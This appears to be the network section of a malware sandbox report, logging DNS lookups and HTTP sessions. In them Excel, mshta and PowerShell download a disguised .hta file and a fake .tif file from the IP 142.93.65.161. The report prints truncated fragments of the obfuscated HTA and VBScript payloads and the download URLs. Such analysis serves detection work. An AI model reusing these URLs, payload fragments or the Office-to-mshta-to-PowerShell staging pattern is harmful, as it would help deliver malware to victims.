                                                                                                                                                                                  Dec 3, 2024 14:01:44.753160954 CET8.8.8.8192.168.2.220x5e5fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 3, 2024 14:01:44.993408918 CET8.8.8.8192.168.2.220x5e5fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • short.ruksk.com
                                                                                                                                                                                  • res.cloudinary.com
                                                                                                                                                                                  • 142.93.65.161
                                                                                                                                                                                  • geoplugin.net

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.2249166142.93.65.161803312C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 3, 2024 14:00:55.853151083 CET381OUTGET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: 142.93.65.161
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033308983 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:00:56 GMT
                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 05:33:52 GMT
                                                                                                                                                                                  ETag: "26ff2-6285702adf515"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 159730
                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/hta
                                                                                                                                                                                  Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 53 63 72 69 70 74 25 32 35 32 30 4c 61 6e 67 75 61 67 65 25 32 35 33 44 25 32 35 32 37 4a 61 76 61 73 63 72 69 70 74 25 32 35 32 37 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 32 30 48 54 4d 4c 25 32 35 32 30 45 6e 63 72 79 70 74 69 6f 6e 25 32 35 32 30 70 72 6f 76 69 64 65 64 25 32 35 32 30 62 79 25 32 35 32 30 74 75 66 61 74 2e 63 6f 6d 25 32 35 32 30 2d 2d 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 25 32 35 32 35 34 34 25 32 35 32 35 34 46 25 32 35 32 35 34 33 25 32 35 32 35 35 34 25 32 35 32 35 35 39 25 32 35 32 35 35 30 25 32 35 32 35 34 35 25 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%2525
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033385992 CET1236INData Raw: 33 43 25 32 35 32 35 37 33 25 32 35 32 35 34 33 25 32 35 32 35 35 32 25 32 35 32 35 34 39 25 32 35 32 35 37 30 25 32 35 32 35 37 34 25 32 35 32 35 32 30 25 32 35 32 35 36 43 25 32 35 32 35 34 31 25 32 35 32 35 36 45 25 32 35 32 35 34 37 25 32 35
                                                                                                                                                                                  Data Ascii: 3C%252573%252543%252552%252549%252570%252574%252520%25256C%252541%25256E%252547%252555%252561%252547%252545%25253D%252522%252556%252542%252573%252563%252552%252549%252550%252574%252522%25253E%25250A%252564%252549%25254D%252520%252520%252520%25
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033629894 CET1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                                                                                                                  Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033643007 CET1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                                                                                                                  Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252579%252549%252572%252572%25256A%25256A%252562%25254A%252
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033981085 CET896INData Raw: 32 35 35 38 25 32 35 32 35 37 39 25 32 35 32 35 35 41 25 32 35 32 35 37 39 25 32 35 32 35 37 32 25 32 35 32 35 37 36 25 32 35 32 35 36 38 25 32 35 32 35 36 44 25 32 35 32 35 37 38 25 32 35 32 35 36 34 25 32 35 32 35 37 39 25 32 35 32 35 34 36 25
                                                                                                                                                                                  Data Ascii: 2558%252579%25255A%252579%252572%252576%252568%25256D%252578%252564%252579%252546%252549%252553%252563%252571%252578%252558%252548%252568%252573%25256E%252553%252575%252570%252547%252578%25254D%252563%25256F%252566%252571%252562%252541%25256A%
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033993959 CET1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                                                                                                                  Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034006119 CET1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                                                                                                                  Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034863949 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                                                                                                                                                  Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034929037 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                                                                                                                  Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034940958 CET1236INData Raw: 36 32 25 32 35 32 35 35 38 25 32 35 32 35 36 41 25 32 35 32 35 35 38 25 32 35 32 35 35 35 25 32 35 32 35 36 38 25 32 35 32 35 37 35 25 32 35 32 35 36 38 25 32 35 32 35 36 42 25 32 35 32 35 35 39 25 32 35 32 35 35 35 25 32 35 32 35 35 35 25 32 35
                                                                                                                                                                                  Data Ascii: 62%252558%25256A%252558%252555%252568%252575%252568%25256B%252559%252555%252555%252572%252547%25256C%252541%252565%252558%25254D%252544%252568%25256C%252552%252553%252550%252555%252567%252570%252553%252552%252566%25256B%252556%25254A%252557%25
                                                                                                                                                                                  Dec 3, 2024 14:00:57.153378010 CET1236INData Raw: 35 32 35 36 41 25 32 35 32 35 37 34 25 32 35 32 35 34 44 25 32 35 32 35 34 33 25 32 35 32 35 36 46 25 32 35 32 35 34 44 25 32 35 32 35 35 31 25 32 35 32 35 35 33 25 32 35 32 35 35 36 25 32 35 32 35 37 37 25 32 35 32 35 36 44 25 32 35 32 35 34 32
                                                                                                                                                                                  Data Ascii: 5256A%252574%25254D%252543%25256F%25254D%252551%252553%252556%252577%25256D%252542%252579%252574%252554%252576%25254A%252574%25256B%25254A%252573%252566%25255A%252543%25256B%252578%252576%252569%252520%252520%252520%252520%252520%252520%252520


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.2249168142.93.65.161803588C:\Windows\System32\mshta.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 3, 2024 14:01:00.479321003 CET458OUTGET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Language: fr-FR
                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Range: bytes=8896-
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Host: 142.93.65.161
                                                                                                                                                                                  If-Range: "26ff2-6285702adf515"
                                                                                                                                                                                  Dec 3, 2024 14:01:01.566916943 CET1236INHTTP/1.1 206 Partial Content
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:01 GMT
                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 05:33:52 GMT
                                                                                                                                                                                  ETag: "26ff2-6285702adf515"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 150834
                                                                                                                                                                                  Content-Range: bytes 8896-159729/159730
                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/hta
                                                                                                                                                                                  Data Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567148924 CET1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                                                                                                                  Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567162037 CET1236INData Raw: 32 35 36 44 25 32 35 32 35 34 33 25 32 35 32 35 37 39 25 32 35 32 35 34 33 25 32 35 32 35 34 34 25 32 35 32 35 34 42 25 32 35 32 35 35 34 25 32 35 32 35 36 31 25 32 35 32 35 36 43 25 32 35 32 35 34 44 25 32 35 32 35 35 39 25 32 35 32 35 37 34 25
                                                                                                                                                                                  Data Ascii: 256D%252543%252579%252543%252544%25254B%252554%252561%25256C%25254D%252559%252574%252541%252565%252541%252566%25257A%252552%252575%252574%25256E%252563%252576%252541%252572%252579%252578%252553%252575%252575%252548%252547%25256C%252550%252567%
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567646980 CET1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                                                                                                                  Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568005085 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                                                                                                                                                  Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568017006 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                                                                                                                  Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568036079 CET1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                                                                                                                  Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568681002 CET1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                                                                                                                  Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568696022 CET1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                                                                                                                  Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568713903 CET1236INData Raw: 32 35 36 36 25 32 35 32 35 35 34 25 32 35 32 35 34 44 25 32 35 32 35 36 31 25 32 35 32 35 36 45 25 32 35 32 35 37 32 25 32 35 32 35 34 41 25 32 35 32 35 37 34 25 32 35 32 35 35 33 25 32 35 32 35 34 41 25 32 35 32 35 34 37 25 32 35 32 35 35 36 25
                                                                                                                                                                                  Data Ascii: 2566%252554%25254D%252561%25256E%252572%25254A%252574%252553%25254A%252547%252556%252541%25256D%252546%25256E%25254E%252550%252573%252567%252569%252558%252564%252547%25254F%252550%252544%25256D%252557%252550%252543%252547%252562%252555%25256B%
                                                                                                                                                                                  Dec 3, 2024 14:01:01.687355042 CET1236INData Raw: 25 32 35 32 35 35 39 25 32 35 32 35 36 36 25 32 35 32 35 35 39 25 32 35 32 35 36 43 25 32 35 32 35 35 36 25 32 35 32 35 34 44 25 32 35 32 35 35 36 25 32 35 32 35 36 36 25 32 35 32 35 37 33 25 32 35 32 35 36 43 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                                                                                                                  Data Ascii: %252559%252566%252559%25256C%252556%25254D%252556%252566%252573%25256C%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.2249169142.93.65.161803720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 3, 2024 14:01:10.399780035 CET373OUTGET /680/weneedkissingwellongirlfriendshebeautifulgirl.tIF HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: 142.93.65.161
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531014919 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:11 GMT
                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 05:30:51 GMT
                                                                                                                                                                                  ETag: "25970-62856f7e236fd"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 153968
                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: image/tiff
                                                                                                                                                                                  Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 63 00 62 00 75 00 73 00 6a 00 4f 00 4c 00 5a 00 63 00 6d 00 57 00 4a 00 47 00 61 00 66 00 20 00 3d 00 20 00 22 00 69 00 4c 00 5a 00 4c 00 55 00 68 00 6e 00 55 00 6b 00 55 00 4c 00 55 00 4c 00 57 00 6f 00 22 00 0d 00 0a 00 6f 00 69 00 74 00 4b 00 55 00 57 00 69 00 49 00 47 00 4c 00 4b 00 69 00 53 00 4b 00 61 00 20 00 3d 00 20 00 22 00 4b 00 69 00 4c 00 64 00 4e 00 4c 00 6d 00 63 00 4b 00 4c 00 6a 00 4c 00 61 00 71 00 41 00 22 00 0d 00 0a 00 68 00 64 00 61 00 4c 00 4f 00 4c 00 4c 00 41 00 61 00 4c 00 50 00 70 00 6b 00 4c 00 69 00 20 00 3d 00 20 00 22 00 57 00 6f 00 4b 00 69 00 78 00 4b 00 4c 00 5a 00 75 00 6d 00 74 00 41 00 64 00 7a 00 62 00 22 00 0d 00 0a 00 0d 00 0a 00 63 00 4c 00 63 00 50 00 47 00 50 00 4c 00 42 00 42 00 4c 00 4c 00 57 00 7a 00 70 00 42 00 20 00 3d 00 20 00 22 00 74 00 67 00 75 00 62 00 57 00 4b 00 74 00 41 00 7a 00 68 00 6e 00 52 00 6c 00 70 00 76 00 22 00 0d 00 0a 00 74 00 66 00 4f 00 68 00 6c 00 5a 00 63 00 69 00 42 00 7a 00 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: cbusjOLZcmWJGaf = "iLZLUhnUkULULWo"oitKUWiIGLKiSKa = "KiLdNLmcKLjLaqA"hdaLOLLAaLPpkLi = "WoKixKLZumtAdzb"cLcPGPLBBLLWzpB = "tgubWKtAzhnRlpv"tfOhlZciBznnZlG = "xiefWspLeLGLGon"ZKKzONeUiePIOkr = "HknpquWLGiTLtod"BdkdOKZAvPKzNuU = "qLRGPluGPkLfWco"KLxWLksfGtGlUlf = "LfAubNLWBNoLLmZ"WtiAULKWQxhWczq = "vIkJLAWxZzKcfui"piBeKOxGmUUiWBv = "UmpZccLqWLrKLaK"xHLNfunWGboHlWi = "AWQCNLBmZfWNHxj"vqBGlmuHhKgaLJL = "xgkSPReOUhLoUeK"abUzLL
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531101942 CET1236INData Raw: 00 5a 00 69 00 76 00 69 00 64 00 57 00 57 00 47 00 6f 00 20 00 3d 00 20 00 22 00 43 00 6a 00 53 00 41 00 7a 00 47 00 4c 00 43 00 63 00 70 00 52 00 47 00 4c 00 4c 00 57 00 22 00 0d 00 0a 00 63 00 4b 00 47 00 43 00 52 00 4c 00 69 00 49 00 4c 00 69
                                                                                                                                                                                  Data Ascii: ZividWWGo = "CjSAzGLCcpRGLLW"cKGCRLiILiuHfkz = "xrsNtfLzfkeLmOK"sZJLKAUGOeOPmbL = "GPKUiLGBTiOotLd"LafCpklxuLcfpk
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531115055 CET1236INData Raw: 00 73 00 57 00 6c 00 68 00 57 00 68 00 22 00 0d 00 0a 00 57 00 6d 00 75 00 7a 00 52 00 57 00 57 00 43 00 5a 00 6b 00 6d 00 69 00 6d 00 42 00 70 00 20 00 3d 00 20 00 22 00 4f 00 48 00 75 00 6f 00 70 00 55 00 47 00 4f 00 55 00 69 00 6f 00 73 00 66
                                                                                                                                                                                  Data Ascii: sWlhWh"WmuzRWWCZkmimBp = "OHuopUGOUiosfcl"NWcKeGBLNgpnKmv = "LWWqLecGoeicbbq"KpaWdUKKpUkCaLb = "QGWfpJcULbKcovi"k
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531495094 CET1236INData Raw: 00 57 00 65 00 20 00 3d 00 20 00 22 00 7a 00 48 00 6e 00 4c 00 47 00 63 00 72 00 57 00 72 00 47 00 66 00 4f 00 68 00 57 00 70 00 22 00 0d 00 0a 00 76 00 50 00 4c 00 57 00 57 00 63 00 57 00 4f 00 57 00 76 00 4c 00 4c 00 6f 00 6f 00 57 00 20 00 3d
                                                                                                                                                                                  Data Ascii: We = "zHnLGcrWrGfOhWp"vPLWWcWOWvLLooW = "WofviLihnGlNKcm"JLOqZntSTlKtLpz = "nWUbkbpxozkgLGW"cZUHWceKtmckOfH = "AiWW
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531506062 CET1236INData Raw: 00 57 00 4b 00 42 00 63 00 6b 00 4c 00 4c 00 4c 00 65 00 4b 00 4c 00 55 00 47 00 4c 00 64 00 20 00 3d 00 20 00 22 00 78 00 4b 00 64 00 4b 00 4c 00 43 00 4c 00 6c 00 78 00 5a 00 42 00 69 00 6e 00 6c 00 63 00 22 00 0d 00 0a 00 4f 00 62 00 4b 00 50
                                                                                                                                                                                  Data Ascii: WKBckLLLeKLUGLd = "xKdKLCLlxZBinlc"ObKPsbLkajqLWoB = "uWnbOOGlLUKZUhx"LnAPgbOcfmhzlGv = "LzqWkLitWWhqmLx"isAGRtAZ
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531517029 CET1236INData Raw: 00 6c 00 4f 00 4c 00 76 00 5a 00 78 00 57 00 54 00 4c 00 48 00 4b 00 50 00 22 00 0d 00 0a 00 66 00 42 00 73 00 43 00 5a 00 62 00 63 00 67 00 41 00 63 00 53 00 4c 00 4a 00 6b 00 55 00 20 00 3d 00 20 00 22 00 61 00 4b 00 50 00 78 00 42 00 65 00 72
                                                                                                                                                                                  Data Ascii: lOLvZxWTLHKP"fBsCZbcgAcSLJkU = "aKPxBerKrgsuNuI"tfiZfbLONCLczLG = "cZWNKukGceeobix"vikuKWLcdmbUklp = "honPWnazLZWmz
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532193899 CET776INData Raw: 00 57 00 6b 00 74 00 49 00 6b 00 6c 00 62 00 69 00 20 00 3d 00 20 00 22 00 74 00 48 00 6d 00 6c 00 4c 00 42 00 57 00 66 00 6f 00 62 00 50 00 69 00 65 00 6e 00 54 00 22 00 0d 00 0a 00 71 00 6b 00 52 00 6c 00 57 00 72 00 57 00 57 00 64 00 6f 00 4b
